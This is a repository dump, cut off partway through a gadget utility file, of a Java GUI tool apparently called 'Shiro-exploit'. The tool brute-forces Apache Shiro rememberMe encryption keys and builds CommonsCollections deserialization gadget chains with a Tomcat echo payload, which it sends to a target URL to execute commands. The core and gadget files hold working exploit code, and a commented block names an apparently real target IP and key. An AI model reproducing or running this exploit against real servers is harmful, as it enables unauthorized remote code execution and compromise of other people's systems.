├── .idea
    ├── .gitignore
    ├── compiler.xml
    ├── encodings.xml
    ├── jarRepositories.xml
    ├── misc.xml
    ├── uiDesigner.xml
    └── vcs.xml
├── Shiro1.0.iml
├── pom.xml
├── readme.md
└── src
    └── main
        ├── java
            ├── Main.java
            ├── core
            │   ├── GadgetsDetect.java
            │   └── ShiroKeyDetect.java
            ├── entity
            │   └── ControllersFactory.java
            ├── gadgets
            │   ├── CommonsCollectionsK1.java
            │   ├── CommonsCollectionsK2.java
            │   └── util
            │   │   ├── Gadgets.java
            │   │   ├── Reflections.java
            │   │   └── Serializer.java
            ├── ui
            │   └── MainController.java
            └── utils
            │   ├── HttpUtils.java
            │   ├── MyCert.java
            │   ├── createAESCBCCipher.java
            │   └── createAESGCMCipher.java
        └── resources
            ├── Main.fxml
            ├── application.css
            └── shirokey.txt


/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 数据源本地存储已忽略文件
5 | /../../../../:\Java\Shiro1.0\.idea/dataSources/
6 | /dataSources.local.xml
7 | # 基于编辑器的 HTTP 客户端请求
8 | /httpRequests/
9 | 


--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="CompilerConfiguration">
 4 |     <annotationProcessing>
 5 |       <profile name="Maven default annotation processors profile" enabled="true">
 6 |         <sourceOutputDir name="target/generated-sources/annotations" />
 7 |         <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
 8 |         <outputRelativeToContentRoot value="true" />
 9 |         <module name="ShiroExp" />
10 |         <module name="Shiro1.0" />
11 |         <module name="ShiroEXP发布版" />
12 |       </profile>
13 |     </annotationProcessing>
14 |   </component>
15 |   <component name="JavacSettings">
16 |     <option name="ADDITIONAL_OPTIONS_OVERRIDE">
17 |       <module name="ShiroEXP发布版" options="-parameters" />
18 |       <module name="ShiroExp" options="-parameters" />
19 |     </option>
20 |   </component>
21 | </project>


--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="Encoding">
4 |     <file url="file://$PROJECT_DIR$/src/main/java" charset="UTF-8" />
5 |     <file url="file://$PROJECT_DIR$/src/main/resources" charset="UTF-8" />
6 |   </component>
7 | </project>


--------------------------------------------------------------------------------
/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="RemoteRepositoriesConfiguration">
 4 |     <remote-repository>
 5 |       <option name="id" value="central" />
 6 |       <option name="name" value="Central Repository" />
 7 |       <option name="url" value="https://repo.maven.apache.org/maven2" />
 8 |     </remote-repository>
 9 |     <remote-repository>
10 |       <option name="id" value="central" />
11 |       <option name="name" value="Maven Central repository" />
12 |       <option name="url" value="https://repo1.maven.org/maven2" />
13 |     </remote-repository>
14 |     <remote-repository>
15 |       <option name="id" value="jboss.community" />
16 |       <option name="name" value="JBoss Community repository" />
17 |       <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
18 |     </remote-repository>
19 |   </component>
20 | </project>


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ExternalStorageConfigurationManager" enabled="true" />
 4 |   <component name="MavenProjectsManager">
 5 |     <option name="originalFiles">
 6 |       <list>
 7 |         <option value="$PROJECT_DIR$/pom.xml" />
 8 |       </list>
 9 |     </option>
10 |   </component>
11 |   <component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" default="true" project-jdk-name="1.8" project-jdk-type="JavaSDK">
12 |     <output url="file://$PROJECT_DIR$/out" />
13 |   </component>
14 | </project>


--------------------------------------------------------------------------------
/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <project version="4">
  3 |   <component name="Palette2">
  4 |     <group name="Swing">
  5 |       <item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
  6 |         <default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
  7 |       </item>
  8 |       <item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
  9 |         <default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
 10 |       </item>
 11 |       <item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.png" removable="false" auto-create-binding="false" can-attach-label="false">
 12 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
 13 |       </item>
 14 |       <item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.png" removable="false" auto-create-binding="false" can-attach-label="true">
 15 |         <default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
 16 |       </item>
 17 |       <item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.png" removable="false" auto-create-binding="true" can-attach-label="false">
 18 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
 19 |         <initial-values>
 20 |           <property name="text" value="Button" />
 21 |         </initial-values>
 22 |       </item>
 23 |       <item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.png" removable="false" auto-create-binding="true" can-attach-label="false">
 24 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
 25 |         <initial-values>
 26 |           <property name="text" value="RadioButton" />
 27 |         </initial-values>
 28 |       </item>
 29 |       <item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.png" removable="false" auto-create-binding="true" can-attach-label="false">
 30 |         <default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
 31 |         <initial-values>
 32 |           <property name="text" value="CheckBox" />
 33 |         </initial-values>
 34 |       </item>
 35 |       <item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.png" removable="false" auto-create-binding="false" can-attach-label="false">
 36 |         <default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
 37 |         <initial-values>
 38 |           <property name="text" value="Label" />
 39 |         </initial-values>
 40 |       </item>
 41 |       <item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.png" removable="false" auto-create-binding="true" can-attach-label="true">
 42 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 43 |           <preferred-size width="150" height="-1" />
 44 |         </default-constraints>
 45 |       </item>
 46 |       <item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.png" removable="false" auto-create-binding="true" can-attach-label="true">
 47 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 48 |           <preferred-size width="150" height="-1" />
 49 |         </default-constraints>
 50 |       </item>
 51 |       <item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.png" removable="false" auto-create-binding="true" can-attach-label="true">
 52 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
 53 |           <preferred-size width="150" height="-1" />
 54 |         </default-constraints>
 55 |       </item>
 56 |       <item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.png" removable="false" auto-create-binding="true" can-attach-label="true">
 57 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 58 |           <preferred-size width="150" height="50" />
 59 |         </default-constraints>
 60 |       </item>
 61 |       <item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
 62 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 63 |           <preferred-size width="150" height="50" />
 64 |         </default-constraints>
 65 |       </item>
 66 |       <item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
 67 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 68 |           <preferred-size width="150" height="50" />
 69 |         </default-constraints>
 70 |       </item>
 71 |       <item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.png" removable="false" auto-create-binding="true" can-attach-label="true">
 72 |         <default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
 73 |       </item>
 74 |       <item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.png" removable="false" auto-create-binding="true" can-attach-label="false">
 75 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 76 |           <preferred-size width="150" height="50" />
 77 |         </default-constraints>
 78 |       </item>
 79 |       <item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.png" removable="false" auto-create-binding="true" can-attach-label="false">
 80 |         <default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
 81 |           <preferred-size width="150" height="50" />
 82 |         </default-constraints>
 83 |       </item>
 84 |       <item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.png" removable="false" auto-create-binding="true" can-attach-label="false">
 85 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
 86 |           <preferred-size width="150" height="50" />
 87 |         </default-constraints>
 88 |       </item>
 89 |       <item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.png" removable="false" auto-create-binding="true" can-attach-label="false">
 90 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
 91 |           <preferred-size width="200" height="200" />
 92 |         </default-constraints>
 93 |       </item>
 94 |       <item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.png" removable="false" auto-create-binding="false" can-attach-label="false">
 95 |         <default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
 96 |           <preferred-size width="200" height="200" />
 97 |         </default-constraints>
 98 |       </item>
 99 |       <item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.png" removable="false" auto-create-binding="true" can-attach-label="true">
100 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
101 |       </item>
102 |       <item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.png" removable="false" auto-create-binding="true" can-attach-label="false">
103 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
104 |       </item>
105 |       <item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.png" removable="false" auto-create-binding="false" can-attach-label="false">
106 |         <default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
107 |       </item>
108 |       <item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
109 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
110 |       </item>
111 |       <item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.png" removable="false" auto-create-binding="false" can-attach-label="false">
112 |         <default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
113 |           <preferred-size width="-1" height="20" />
114 |         </default-constraints>
115 |       </item>
116 |       <item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.png" removable="false" auto-create-binding="false" can-attach-label="false">
117 |         <default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
118 |       </item>
119 |       <item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
120 |         <default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
121 |       </item>
122 |     </group>
123 |   </component>
124 | </project>


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/Shiro1.0.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="JAVA_MODULE" version="4" />


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>com.detect</groupId>
 8 |     <artifactId>ShiroKeyDetect</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <parent>
12 |         <groupId>org.springframework.boot</groupId>
13 |         <artifactId>spring-boot-starter-parent</artifactId>
14 |         <version>2.4.2</version>
15 |         <relativePath/> <!-- lookup parent from repository -->
16 |     </parent>
17 | 
18 | 
19 |     <properties>
20 |         <java.version>1.8</java.version>
21 |     </properties>
22 | 
23 |     <dependencies>
24 |         <dependency>
25 |             <groupId>org.apache.shiro</groupId>
26 |             <artifactId>shiro-core</artifactId>
27 |             <version>1.2.4</version>
28 |         </dependency>
29 |         <dependency>
30 |             <groupId>commons-collections</groupId>
31 |             <artifactId>commons-collections</artifactId>
32 |             <version>3.2.1</version>
33 |         </dependency>
34 |         <dependency>
35 |             <groupId>org.javassist</groupId>
36 |             <artifactId>javassist</artifactId>
37 |             <version>3.27.0-GA</version>
38 |         </dependency>
39 |         <dependency>
40 |             <groupId>com.nqzero</groupId>
41 |             <artifactId>permit-reflect</artifactId>
42 |             <version>0.3</version>
43 |         </dependency>
44 |         <dependency>
45 |             <groupId>org.apache.commons</groupId>
46 |             <artifactId>commons-collections4</artifactId>
47 |             <version>4.0</version>
48 |         </dependency>
49 |         <dependency>
50 |             <groupId>commons-logging</groupId>
51 |             <artifactId>commons-logging-api</artifactId>
52 |             <version>1.1</version>
53 |         </dependency>
54 |     </dependencies>
55 | 
56 |     <build>
57 |         <plugins>
58 |             <plugin>
59 |                 <groupId>org.springframework.boot</groupId>
60 |                 <artifactId>spring-boot-maven-plugin</artifactId>
61 |                 <version>2.4.2</version>
62 |             </plugin>
63 |         </plugins>
64 |     </build>
65 | </project>


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | # Shiro-exploit
 2 | 小白适用的 Shiro 可视化利用工具，界面简洁，傻瓜式漏洞检测工具
 3 | 
 4 | ![image-20211108104526739](https://i.loli.net/2021/11/08/R6WakGXcFZKwgE5.png)
 5 | 
 6 | 
 7 | 
 8 | ## 免责声明
 9 | 该项目仅供合法的渗透测试以及爱好者参考学习，请各位遵守《中华人民共和国网络安全法》以及相应地方的法律，禁止使用该项目进行违法操作，否则自行承担相关责任
10 | 
11 | ### 目前已实现：
12 | 1. 支持密钥爆破以及 CBC/GCM 两种加密模式
13 | 2. 支持检测利用链CommonsCollectionsK1，CommonsCollectionsK2
14 | 3. 支持命令执行回显（Tomcat）
15 | 
16 | 
17 | 
18 | 利用效果：
19 | 
20 | ![image-20211108104526739](https://i.loli.net/2021/11/08/R6WakGXcFZKwgE5.png)
21 | 
22 | 
23 | 
24 | ### 参考
25 | 感谢前辈们的优秀文章和优秀项目 
26 | 
27 | 冰蝎: https://github.com/KpLi0rn/ShiroExploit
28 | 
29 | shiro_attack: https://github.com/j1anFen/shiro_attack
30 | 
31 | 一种另类的检测思路:http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/
32 | 
33 | 长亭师傅的yso回显:https://github.com/zema1/ysoserial
34 | 


--------------------------------------------------------------------------------
/src/main/java/Main.java:
--------------------------------------------------------------------------------
 1 | import javafx.application.Application;
 2 | import javafx.fxml.FXMLLoader;
 3 | import javafx.scene.Parent;
 4 | import javafx.scene.Scene;
 5 | import javafx.stage.Stage;
 6 | 
 7 | /**
 8 |  * Hello world!
 9 |  */
10 | public class Main extends Application {
11 | 
12 |     public static void main(String[] args) {
13 |         launch(args);
14 |     }
15 | 
16 |     public void start(Stage primaryStage) throws Exception {
17 |         Parent root = FXMLLoader.load(getClass().getClassLoader().getResource("Main.fxml"));
18 |         Scene scene = new Scene(root);
19 |         scene.getStylesheets().add(getClass().getClassLoader().getResource("application.css").toExternalForm());
20 | 
21 |         primaryStage.setTitle("Shiro 利用工具 by Yang_99");
22 |         primaryStage.setScene(scene);
23 |         primaryStage.show();
24 |     }
25 | }


--------------------------------------------------------------------------------
/src/main/java/core/GadgetsDetect.java:
--------------------------------------------------------------------------------
 1 | package core;
 2 | 
 3 | import entity.ControllersFactory;
 4 | import gadgets.CommonsCollectionsK1;
 5 | import gadgets.CommonsCollectionsK2;
 6 | import gadgets.util.Gadgets;
 7 | import ui.MainController;
 8 | import utils.HttpUtils;
 9 | import utils.createAESCBCCipher;
10 | import utils.createAESGCMCipher;
11 | 
12 | public class GadgetsDetect {
13 |     String gadget="";
14 |     final private MainController myController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
15 |     public String GadgetsBurp(String url, String Shirokey, String mode) throws Exception {
16 |         this.commonsCollectionsK1(url,Shirokey,mode);
17 |         this.commonsCollectionsK2(url,Shirokey,mode);
18 |         return gadget;
19 |     }
20 | 
21 |     public void GadgetsExp(String url,String Shirokey,String mode,String gadget,String cmd) throws Exception {
22 |         String payload = "";
23 |         if(gadget == "commonsCollectionsK1"){
24 |             CommonsCollectionsK1 commonsCollectionsK1 = new CommonsCollectionsK1();
25 |             Object object = commonsCollectionsK1.getObject("calc");
26 |             if(mode=="CBC"){
27 |                 payload = createAESCBCCipher.encrypt(Shirokey,object);
28 |             }else {
29 |                 payload = createAESGCMCipher.encrypt(Shirokey,object);
30 |             }
31 |             String res = HttpUtils.sendGet(url,payload,cmd);
32 |             this.myController.result.appendText("[*]利用链commonsCollectionsK1\n[*]执行"+cmd+"\n");
33 |             this.myController.result.appendText("[*]"+res+"\n");
34 |         }else if(gadget == "commonsCollectionsK2"){
35 |             CommonsCollectionsK1 commonsCollectionsK1 = new CommonsCollectionsK1();
36 |             Object object = commonsCollectionsK1.getObject("calc");
37 |             if(mode=="CBC"){
38 |                 payload = createAESCBCCipher.encrypt(Shirokey,object);
39 |             }else {
40 |                 payload = createAESGCMCipher.encrypt(Shirokey,object);
41 |             }
42 |             String res = HttpUtils.sendGet(url,payload,cmd);
43 |             this.myController.result.appendText("[*]利用链commonsCollectionsK2\n[*]执行"+cmd+"\n");
44 |             this.myController.result.appendText("[*]"+res+"\n");
45 |         }else {
46 |             this.myController.result.appendText("[*]未找到利用链\n");
47 |         }
48 | 
49 | 
50 |     }
51 |     public String commonsCollectionsK1(String url,String Shirokey,String mode) throws Exception {
52 |         String payload = "";
53 |         CommonsCollectionsK1 commonsCollectionsK1 = new CommonsCollectionsK1();
54 |         CommonsCollectionsK2 commonsCollectionsK2 = new CommonsCollectionsK2();
55 |         Object object = commonsCollectionsK1.getObject("calc");
56 |         if(mode=="CBC"){
57 |             payload = createAESCBCCipher.encrypt(Shirokey,object);
58 |         }else {
59 |             payload = createAESGCMCipher.encrypt(Shirokey,object);
60 |         }
61 |         String res = HttpUtils.getHeader(url,payload);
62 |         if(res.contains("23f20bfc119b58355179e1f33722f14c")){
63 |             if(gadget == ""){
64 |                 gadget = "commonsCollectionsK1";
65 |             }
66 |         }
67 |         return gadget;
68 |     }
69 |     public String commonsCollectionsK2(String url,String Shirokey,String mode) throws Exception {
70 |         String payload = "";
71 |         CommonsCollectionsK1 commonsCollectionsK1 = new CommonsCollectionsK1();
72 |         CommonsCollectionsK2 commonsCollectionsK2 = new CommonsCollectionsK2();
73 |         Object object = commonsCollectionsK1.getObject("calc");
74 |         if(mode=="CBC"){
75 |             payload = createAESCBCCipher.encrypt(Shirokey,object);
76 |         }else {
77 |             payload = createAESGCMCipher.encrypt(Shirokey,object);
78 |         }
79 |         String res = HttpUtils.getHeader(url,payload);
80 |         if(res.contains("23f20bfc119b58355179e1f33722f14c")){
81 |             if(gadget == ""){
82 |                 gadget = "commonsCollectionsK1";
83 |             }
84 |         }
85 |         return gadget;
86 |     }
87 | //    public static void main(String[] args) throws Exception {
88 | //        String targetUrl="http://119.96.202.68:9080/login";
89 | //        String shirokey="fCq+/xW488hMTCD+cmJ3aQ==";
90 | //        String mode = "GCM";
91 | //        GadgetsDetect gadgetsDetect = new GadgetsDetect();
92 | //        String hah = gadgetsDetect.GadgetsBurp(targetUrl,shirokey,mode);
93 | //        System.out.println(hah);
94 | //    }
95 | }
96 | 


--------------------------------------------------------------------------------
/src/main/java/core/ShiroKeyDetect.java:
--------------------------------------------------------------------------------
 1 | package core;
 2 | 
 3 | import entity.ControllersFactory;
 4 | import org.apache.shiro.subject.SimplePrincipalCollection;
 5 | import ui.MainController;
 6 | import utils.createAESGCMCipher;
 7 | import utils.createAESCBCCipher;
 8 | import utils.HttpUtils;
 9 | 
10 | import java.io.*;
11 | import java.util.HashMap;
12 | import java.util.Map;
13 | 
14 | public class ShiroKeyDetect {
15 |     final private MainController myController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
16 |     //检测是否为shiro框架
17 |     public static boolean isShiro(String url){
18 |         boolean flag = false;
19 |         String result = HttpUtils.getHeader(url,"1");
20 |         flag = result.contains("=deleteMe");
21 | 
22 |         return flag;
23 |     }
24 |     //爆破shirokey
25 |     public Map<String,String> ShiroKey(String url) throws Exception {
26 |         String shirokey = "";
27 |         String mode = "";
28 |         SimplePrincipalCollection simplePrincipalCollection = new SimplePrincipalCollection();
29 |         InputStream  fis  =  ShiroKeyDetect.class.getClassLoader().getResourceAsStream("shirokey.txt");
30 | 
31 |         if (fis != null){
32 |             BufferedReader reader = new BufferedReader(new InputStreamReader(fis));
33 |             String key = null;
34 |             //先爆破CBC加密方式
35 |             while ((key = reader.readLine()) != null){
36 |                 String cookieCBC = createAESCBCCipher.encrypt(key,simplePrincipalCollection);
37 |                 String cookieGCM = createAESGCMCipher.encrypt(key,simplePrincipalCollection);
38 | 
39 |                 String resCBC = HttpUtils.getHeader(url,cookieCBC);
40 |                 String resGCM = HttpUtils.getHeader(url,cookieGCM);
41 | 
42 |                 if (!resCBC.contains("=deleteMe")){
43 |                     shirokey = key;
44 |                     mode = "CBC";
45 |                     System.out.println("[*]CBC\n");
46 |                     System.out.println("[*]"+key+"\n");
47 |                     this.myController.result.appendText("[*]加密方式AES-CBC\n");
48 |                     this.myController.result.appendText("[*]"+key+"\n");
49 |                     break;
50 |                 }else if(!resGCM.contains("=deleteMe")){
51 |                     shirokey = key;
52 |                     mode = "GCM";
53 |                     System.out.println("[*]GCM");
54 |                     System.out.println("[*]"+key);
55 |                     this.myController.result.appendText("[*]加密方式AES-GCM\n");
56 |                     this.myController.result.appendText("[*]"+key+"\n");
57 |                     break;
58 |                 }else {
59 |                     this.myController.result.appendText("[-]"+key+"\n");
60 |                 }
61 |             }
62 |         }
63 |         Map<String,String> map = new HashMap<String,String>();
64 |         map.put("shirokey",shirokey);
65 |         map.put("mode",mode);
66 |         return map;
67 |     }
68 | 
69 | }
70 | 


--------------------------------------------------------------------------------
/src/main/java/entity/ControllersFactory.java:
--------------------------------------------------------------------------------
1 | package entity;
2 | 
3 | import java.util.HashMap;
4 | import java.util.Map;
5 | 
6 | public class ControllersFactory {
7 |     public static Map<String,Object> controllers = new HashMap<>();
8 | }
9 | 


--------------------------------------------------------------------------------
/src/main/java/gadgets/CommonsCollectionsK1.java:
--------------------------------------------------------------------------------
 1 | package gadgets;
 2 | 
 3 | import gadgets.util.Gadgets;
 4 | import gadgets.util.Reflections;
 5 | import org.apache.commons.collections.functors.InvokerTransformer;
 6 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
 7 | import org.apache.commons.collections.map.LazyMap;
 8 | import utils.HttpUtils;
 9 | import utils.createAESCBCCipher;
10 | 
11 | import java.util.HashMap;
12 | import java.util.Map;
13 | 
14 | 
15 | public class CommonsCollectionsK1 {
16 |     public Map getObject(final String command) throws Exception {
17 |         Object tpl = Gadgets.createTemplatesTomcatEcho();
18 |         InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
19 | 
20 |         HashMap<String, String> innerMap = new HashMap<String, String>();
21 |         Map m = LazyMap.decorate(innerMap, transformer);
22 | 
23 |         Map outerMap = new HashMap();
24 |         TiedMapEntry tied = new TiedMapEntry(m, tpl);
25 |         outerMap.put(tied, "t");
26 |         // clear the inner map data, this is important
27 |         innerMap.clear();
28 | 
29 |         Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
30 |         return outerMap;
31 |     }
32 | }
33 | 


--------------------------------------------------------------------------------
/src/main/java/gadgets/CommonsCollectionsK2.java:
--------------------------------------------------------------------------------
 1 | package gadgets;
 2 | 
 3 | import gadgets.util.Gadgets;
 4 | import gadgets.util.Reflections;
 5 | import org.apache.commons.collections4.functors.InvokerTransformer;
 6 | import org.apache.commons.collections4.keyvalue.TiedMapEntry;
 7 | import org.apache.commons.collections4.map.LazyMap;
 8 | 
 9 | import java.util.HashMap;
10 | import java.util.Map;
11 | 
12 | public class CommonsCollectionsK2 {
13 |     public Map getObject(final String command) throws Exception {
14 |         Object tpl = Gadgets.createTemplatesTomcatEcho();
15 |         InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
16 | 
17 |         HashMap<String, String> innerMap = new HashMap<String, String>();
18 |         Map m = LazyMap.lazyMap(innerMap, transformer);
19 | 
20 |         Map outerMap = new HashMap();
21 |         TiedMapEntry tied = new TiedMapEntry(m, tpl);
22 |         outerMap.put(tied, "t");
23 |         // clear the inner map data, this is important
24 |         innerMap.clear();
25 | 
26 |         Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
27 |         return outerMap;
28 |     }
29 | }
30 | 


--------------------------------------------------------------------------------
/src/main/java/gadgets/util/Gadgets.java:
--------------------------------------------------------------------------------
  1 | package gadgets.util;
  2 | 
  3 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  5 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  6 | import javassist.*;
  7 | 
  8 | import java.lang.reflect.Field;
  9 | 
 10 | public class Gadgets {
 11 |     public static Object createTemplatesTomcatEcho() throws Exception {
 12 |         if (Boolean.parseBoolean(System.getProperty("properXalan", "false"))) {
 13 |             return createTemplatesImplEcho(
 14 |                     Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),
 15 |                     Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),
 16 |                     Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"));
 17 |         }
 18 | 
 19 |         return createTemplatesImplEcho(TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
 20 |     }
 21 | 
 22 |     public static <T> T createTemplatesImplEcho(Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory)
 23 |             throws Exception {
 24 |         final T templates = tplClass.newInstance();
 25 | 
 26 |         // use template gadget class
 27 |         ClassPool pool = ClassPool.getDefault();
 28 |         pool.insertClassPath(new ClassClassPath(abstTranslet));
 29 |         CtClass clazz;
 30 |         clazz = pool.makeClass("ysoserial.Pwner" + System.nanoTime());
 31 |         if (clazz.getDeclaredConstructors().length != 0) {
 32 |             clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
 33 |         }
 34 |         clazz.addMethod(CtMethod.make("private static void writeBody(Object resp, byte[] bs) throws Exception {\n" +
 35 |                 "    Object o;\n" +
 36 |                 "    Class clazz;\n" +
 37 |                 "    try {\n" +
 38 |                 "        clazz = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
 39 |                 "        o = clazz.newInstance();\n" +
 40 |                 "        clazz.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(o, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
 41 |                 "        resp.getClass().getMethod(\"doWrite\", new Class[]{clazz}).invoke(resp, new Object[]{o});\n" +
 42 |                 "    } catch (ClassNotFoundException e) {\n" +
 43 |                 "        clazz = Class.forName(\"java.nio.ByteBuffer\");\n" +
 44 |                 "        o = clazz.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(clazz, new Object[]{bs});\n" +
 45 |                 "        resp.getClass().getMethod(\"doWrite\", new Class[]{clazz}).invoke(resp, new Object[]{o});\n" +
 46 |                 "    } catch (NoSuchMethodException e) {\n" +
 47 |                 "        clazz = Class.forName(\"java.nio.ByteBuffer\");\n" +
 48 |                 "        o = clazz.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(clazz, new Object[]{bs});\n" +
 49 |                 "        resp.getClass().getMethod(\"doWrite\", new Class[]{clazz}).invoke(resp, new Object[]{o});\n" +
 50 |                 "    }\n" +
 51 |                 "}", clazz));
 52 |         clazz.addMethod(CtMethod.make("private static Object getFV(Object o, String s) throws Exception {\n" +
 53 |                 "    java.lang.reflect.Field f = null;\n" +
 54 |                 "    Class clazz = o.getClass();\n" +
 55 |                 "    while (clazz != Object.class) {\n" +
 56 |                 "        try {\n" +
 57 |                 "            f = clazz.getDeclaredField(s);\n" +
 58 |                 "            break;\n" +
